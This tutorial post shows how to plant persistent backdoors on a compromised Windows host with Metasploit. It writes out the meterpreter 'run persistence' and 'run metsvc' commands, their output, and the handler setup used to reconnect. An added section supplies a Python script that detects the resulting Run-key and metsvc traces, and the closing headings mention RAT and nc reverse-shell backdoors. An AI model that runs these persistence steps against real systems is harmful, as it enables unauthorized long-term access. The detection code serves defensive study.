Metasploit: a couple of ways to build a backdoor

Published: 2013-01-24 12:02  Source: the web  Author: upload

1. Meterpreter's built-in scripts

Method 1: run persistence

The available options can be listed with run persistence -h:

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443
[*] Persistent agent script is 609496 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[+] Agent executed with PID 3272
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY

As the output shows, the autorun entry is created by adding a value under the registry Run key, and what it launches is the VBS script backdoor dropped in the TEMP directory.

Connecting to it:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LHOST 192.168.1.139
LHOST => 192.168.1.139
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...

Nothing is started by default; after the target machine reboots, a meterpreter shell is obtained successfully.

Method 2: run metsvc

Run the metsvc script:

meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

This creates a new service that is set to start automatically (image name metsvc.exe, service name metsvc). Connecting to the backdoor:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...

meterpreter >

Connected successfully.
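Both methods above leave characteristic traces on the host: method 1 adds a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points at a .vbs file in C:\WINDOWS\TEMP, and method 2 installs an auto-start service named metsvc whose binaries sit in a random directory under TEMP and which listens on port 31337. The following Python script is an example added by the editor, not code from the original post or from the Metasploit project; it shows how a defender would hunt for exactly these two patterns. It runs on constructed sample data shaped like an export of the Run key and of the service list (the entry names and paths are copied from the output above purely as illustration); on a live host the same functions would be fed from `reg query`, `sc query` or `netstat` output.

```python
"""Hunt for the two Metasploit persistence patterns shown in the post.

Added example (editor's code, not the post's or Metasploit's). The
SAMPLE_* data below is constructed for illustration only.
"""
import re
from typing import Dict, Iterable, List, Tuple

# A Run-key value whose command points into a TEMP directory and ends in a
# script or executable extension, which is the shape of the persistence
# script's install (C:\WINDOWS\TEMP\<random>.vbs).
TEMP_PAYLOAD_RE = re.compile(
    r'\\temp\\[^\\\s"]+\.(?:vbs|vbe|js|jse|wsf|bat|ps1|exe)\b',
    re.IGNORECASE,
)
SCRIPT_EXT_RE = re.compile(r'\.(?:vbs|vbe|js|jse|wsf)\b', re.IGNORECASE)

METSVC_DEFAULT_PORT = 31337  # default port printed by "run metsvc"


def suspicious_run_entries(run_values: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Return (value_name, command, reasons) for Run-key values that look
    like the persistence-script autorun entry.

    run_values maps each value name under the Run key to its command string.
    """
    findings = []
    for name, command in run_values.items():
        reasons = []
        if TEMP_PAYLOAD_RE.search(command):
            reasons.append("launches a file from a TEMP directory")
        if SCRIPT_EXT_RE.search(command):
            reasons.append("autorun target is a script file")
        if reasons:
            findings.append((name, command, reasons))
    return findings


def suspicious_services(services: Iterable[Dict]) -> List[Tuple[str, List[str]]]:
    """Return (service_name, reasons) for services that look like metsvc.

    Each record carries: name, image_path, start_type and port (None when
    the service binary is not listening).
    """
    findings = []
    for svc in services:
        reasons = []
        name = svc["name"].lower()
        image = svc["image_path"].lower()
        if name == "metsvc" or image.endswith("\\metsvc.exe"):
            reasons.append("metsvc service name or image name")
        if "\\temp\\" in image:
            reasons.append("service image lives under TEMP")
        if svc.get("port") == METSVC_DEFAULT_PORT:
            reasons.append("listening on the metsvc default port 31337")
        if reasons and svc.get("start_type", "").lower() == "auto":
            reasons.append("configured to start automatically")
        if reasons:
            findings.append((svc["name"], reasons))
    return findings


# Constructed sample data, modelled on the output in the post.
SAMPLE_RUN = {
    "OneDrive": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "FCBCUBtLrzFY": r"C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs",
}
SAMPLE_SERVICES = [
    {"name": "Spooler", "image_path": r"C:\Windows\System32\spoolsv.exe",
     "start_type": "auto", "port": None},
    {"name": "metsvc", "image_path": r"C:\WINDOWS\TEMP\kqaqtcsWhBTbO\metsvc.exe",
     "start_type": "auto", "port": 31337},
]


def report(run_values: Dict[str, str], services: Iterable[Dict]) -> List[str]:
    """Render both checks as one list of human-readable finding lines."""
    lines = []
    for name, command, reasons in suspicious_run_entries(run_values):
        lines.append(f"RUN  {name}: {command}  [{'; '.join(reasons)}]")
    for name, reasons in suspicious_services(services):
        lines.append(f"SVC  {name}  [{'; '.join(reasons)}]")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_RUN, SAMPLE_SERVICES):
        print(line)
```

Note that the persistence script also writes a cleanup resource file (the .rc path printed in its output); a defender reviewing an attacker's Metasploit logs gets the same registry value name and script path from that file as the checks above recover from the host.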

2. Custom backdoors

Method 1: upload a remote-control (RAT) tool

Method 2: upload nc or another reverse shell

Creating an nc reverse-shell backdoor on BT5
